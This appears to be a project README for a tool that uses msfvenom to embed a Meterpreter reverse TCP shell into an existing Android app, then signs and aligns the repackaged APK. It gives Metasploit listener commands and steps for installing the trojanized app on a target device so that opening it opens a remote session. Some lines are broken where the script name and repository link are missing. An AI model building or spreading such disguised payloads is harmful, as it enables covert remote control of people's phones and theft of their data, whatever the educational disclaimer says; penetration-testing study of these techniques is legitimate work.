Author: Declanmidd
The Android Payload Generator is a tool designed for educational security purposes. It allows users to generate a malicious Android APK that contains a Meterpreter reverse shell payload. This tool utilizes msfvenom
to embed the payload into an existing APK, making it useful for penetration testing and security research.
Disclaimer: This tool is intended for educational use only. Always ensure you have permission to test the target device.
- Generates a Meterpreter reverse TCP payload.
- Embeds the payload into an existing APK template.
- Signs the APK for successful installation on Android devices.
- Verifies and aligns the APK for optimal performance.
- Kali Linux or a similar distribution with Metasploit installed.
- Java Development Kit (JDK) for APK signing.
- Android SDK tools, specifically
Clone the repository:
git clone cd stealth
Make the script executable:
chmod +x
: The local IP address that the payload will connect back to.<LPORT>
: The port on which the listener will wait for the incoming connection.<TEMPLATE_APK>
: The path to the existing APK that will be used as a template.
Start Metasploit to set up a listener:
Set up the listener in Metasploit:
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST <Your Local IP> set LPORT <Your Port> exploit
Run the payload generator script:
./ 4444 /path/to/template.apk
Install the generated APK (
) on the target Android device. -
Once the target device opens the APK, you should receive a Meterpreter session in your Metasploit console.
- Generates Payload: Uses
to create a Meterpreter payload embedded in a specified template APK. - Creates Keystore: Automatically generates a keystore to sign the APK.
- Signs the APK: Ensures that the APK is properly signed for installation on Android devices.
- Verifies and Aligns: Confirms that the APK is correctly signed and optimized for performance.
- Use Responsibly: Only use this tool on devices and networks you own or have explicit permission to test.
- Dependencies: Ensure all required packages are installed before running the script.
This project is licensed under the MIT License - see the LICENSE file for details.